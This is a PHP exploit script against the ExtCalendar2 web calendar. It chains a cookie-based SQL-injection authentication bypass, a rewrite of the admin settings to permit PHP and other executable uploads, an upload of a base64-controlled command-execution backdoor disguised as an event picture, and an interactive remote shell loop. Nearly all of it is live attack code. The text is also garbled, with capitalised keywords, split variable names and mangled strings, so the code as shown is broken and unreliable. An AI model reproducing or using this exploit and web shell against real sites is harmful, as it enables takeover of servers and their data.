<?
If (! $ Argv [1])
Die ("
Usage: php exploit. php [site]
Example: php exploit. php http://www.bkjia.com/calendar/
");
Print_r ("
# Exploit...: [ExtCalendar2 (Auth Bypass/Cookie) SQL Injection]
# Author...: [Lagripe-Dz]
# Date ......: [05-o6-2o11]
# Twitter...: [@ Lagripe_Dz]
# HoMe ......: [Sec4Ever.com & Lagripe-Dz.org]
# Download ..: [http://sourceforge.net/projects/extcal/]
# Video...: [http://www.youtube.com/watch? V = 2aatog92oqU]
-= [ExPloiT] =-
Javascript: document. cookie = \ "ext20_username = admin' or '1' = '1 \";
Javascript: document. cookie = \ "ext20_password = admin' or '1' = '1 \";
-= [Start] =-
");
$ Target = $ argv [1];
If (! Extension_loaded ("curl") {die ("error: cURL extension required ");}
# First get cookie prefix from page source (xxx_username by default> ext20_username)
Preg_match_all ('# extcal_cookie_id = "(. *)" #', DzCURL ($ target, 0, 0), $ prf );
$ Prefix = $ prf [1] [0];
# Header ..
$ Header [] = "Cookie :". $ prefix. "_ username = admin' or '1' = '1 ;". $ prefix. "_ password = admin' or '1' = '1 ;";
# Check if it's work by looking for [logout]
Echo (eregi ("logout", DzCURL ($ target, 0, $ header )))? "# Login: D \ n": die ("# Failed: Can't Login ");
# Data of new settings with allowed php extension
$ New_settings = Array (
"Calendar_name" => "Calendar name", "calendar_description" => "Calendar description ",
"Calendar_admin_email" => "Calendar Administrator email", "cookie_name" => "ext20 ",
"Cookie_path" => "/", "debug_mode" => 1, "calendar_status" => 1, "lang" => "english ",
"Charset" => "language-file", "theme" => "default", "timezone" => 1, "time_format_24hours" => 1,
"Auto_daylight_saving" => 1, "main_table_width" => "50%", "day_start" => 1, "default_view" => 1,
"Search_view" => 1, "archive" => 1, "events_per_page" => 5, "sort_order" => "ta ",
"Show_recurrent_events" => 1, "multi_day_events" => "all", "legend_cat_columns" => 5,
"Allow_user_regiils" => 1, "reg_duplicate_emails" => 1, "reg_email_verify" => 1,
"Popup_event_mode" => 1, "popup_event_width" => 1, "popup_event_height" => 1,
"Add_event_view" => 1, "addevent_allow_html" => 1, "addevent_allow_contact" => 1,
"Addevent_allow_email" => 1, "addevent_allow_url" => 1, "addevent_allow_picture" => 1,
"New_post_notification" => 1, "monthly_view" => 1, "cal_view_show_week" => 1,
"Cal_view_max_chars" => 100, "flyer_view" => 1, "flyer_show_picture" => 1,
"Flyer_view_max_chars" => 100, "weekly_view" => 1, "weekly_view_max_chars" => 100,
"Daily_view" => 1, "daily_view_max_chars" => 100, "cats_view" => 1, "cats_view_max_chars" => 100,
"Mini_cal_def_picture" => 1, "mini_cal_diplay_options" => "default", "mail_method" => "smtp ",
"Mail_smtp_host" => 0, "mail_smtp_auth" => 1, "mail_smtp_username" => 0, "mail_smtp_password" => 0,
"Max_upl_dim" => 99999999999999999, "max_upl_size" => 99999999999999999, "picture_chmod" => 755,
"Allowed_file_extensions" => "PHP/PY/PERL/HTACCESS/ASP/ASPX", "update_config" => "Save New Configuration ");
# Post data and check if settings updated and php added
Echo (eregi ("<strong>. * </strong>", DzCURL ($ target. "admin_settings.php", $ new_settings, $ header )))? "# Settings Updated: D \ n": die ("# Failed: can't update settings ");
# Get event id for connect 2 backdoor
$ Events = DzCURL ($ target. "admin_events.php? Eventfilter = 0 ", 0, $ header );
Preg_match_all ('# edit & id = (:? [0-9] +) # ', $ events, $ r );
# Backdoor xD
$ Bd = "<?
Echo Exe (base64_decode (\ $ _ GET [dz]);
Function Exe (\ $ command)
{
If (function_exists ('passthru') {\ $ exec = passthru (\ $ command );}
Elseif (function_exists ('system ')&&! \ $ Exec) {\$ exec = system (\ $ command );}
Elseif (function_exists ('exec ')&&! \ $ Exec) {exec (\ $ command, \ $ output); \ $ exec = join (\ "\ n \", \ $ output );}
Elseif (function_exists ('Shell _ exec ')&&! \ $ Exec) {\$ exec = shell_exec (\ $ command );}
Elseif (function_exists ('popen ')&&! \ $ Exec) {\ $ fp = popen (\ $ command, \ "r \");
{While (! Feof (\ $ fp) {\ $ result. = fread (\ $ fp, 1024) ;}pclose (\ $ fp) ;}\$ exec = convert_cyr_string (\ $ result, \ "d \", \ "w \");}
Elseif (function_exists ('win _ shell_execute ')&&! \ $ Exec) {\$ exec = winshell (\ $ command );}
Elseif (function_exists ('win32 _ create_service ')&&! \ $ Exec) {\$ exec = srvshell (\ $ command );}
Elseif (extension_loaded ('ffi ')&&! \ $ Exec) {\$ exec = ffishell (\ $ command );}
Elseif (extension_loaded ('perl ')&&! \ $ Exec) {\$ exec = perlshell (\ $ command );}
Elseif (! \ $ Exec) {\$ exec = slashBypass (\ $ command );}
Elseif (! \ $ Exec & extension_loaded ('python '))
{\ $ Exec = python_eval (\ "import OS
Pwd = OS. getcwd ()
Print pwd
OS. system ('\ ". \ $ command .\"')\");}
Elseif (\ $ exec) {return \ $ exec ;}
}
?> ";
# Make bd
File_put_contents ("dz. php", $ bd );
# New event with php backdoor
$ Post_bd = array (
"Mode" => "edit", "id" => $ r [1] [0], "title" => "blabla ",
"Description" => "bla,", "cat" => 1,
"Day" => 22, "month" => 11," year "=> 2011,
"Picture" => "@". realpath ("dz. php "),
"Submit" => "Update Event ");
# Post backdoor & check
Echo (! Eregi ("<strong> Errors </strong>", DzCURL ($ target. "admin_events.php", $ post_bd, $ header )))? "# Backdoor uploaded: D \ n": die ("# Failed: can't upload Backdoor ");
@ Unlink ("dz. php"); # del backdoor after uploading
# Looking for backdoor
Preg_match_all ('# upload /(:? [A-z0-9] +) _ dz. php # ', DzCURL ($ target. "admin_events.php? Mode = view & id = ". $ r [1] [0], 0, $ header), $ r2 );
Echo (! $ R2 [0] [0])? Die ("# Failed: Backdoor not found! "):"";
# Connecting with backdoor: P
While (1 ){
Fwrite (STDOUT, "\ ncmd ~ #");
// (Trim (fgets (STDIN) = "exit ")? Exit: ""; // exit from loop
$ Cmd = base64_encode (trim (fgets (STDIN ))));
Echo DzCURL ($ target. $ r2 [0] [0]. "? Dz = ". $ cmd, 0, 0 );
}
# Function...
Function DzCURL ($ url, $ posts, $ header ){
$ Curl = curl_init ();
Curl_setopt ($ curl, CURLOPT_RETURNTRANSFER, 1 );
If (is_array ($ header )){
Curl_setopt ($ curl, CURLOPT_HTTPHEADER, $ header );
}
Curl_setopt ($ curl, CURLOPT_URL, $ url );
Curl_setopt ($ curl, CURLOPT_USERAGENT, 'mozilla/5.0 (Windows NT 5.1; rv: 2.0.1) Gecko/20100101 Firefox/4.0.1 DzCURL = )');
Curl_setopt ($ curl, CURLOPT_FOLLOWLOCATION, 1 );
If (is_array ($ posts )){
Curl_setopt ($ curl, CURLOPT_POST, 1 );
Curl_setopt ($ curl, CURLOPT_POSTFIELDS, $ posts );
}
Curl_setopt ($ curl, CURLOPT_TIMEOUT, 5 );
$ Exec = curl_exec ($ curl );
Curl_close ($ curl );
Return $ exec;
}
# _ EOF
?>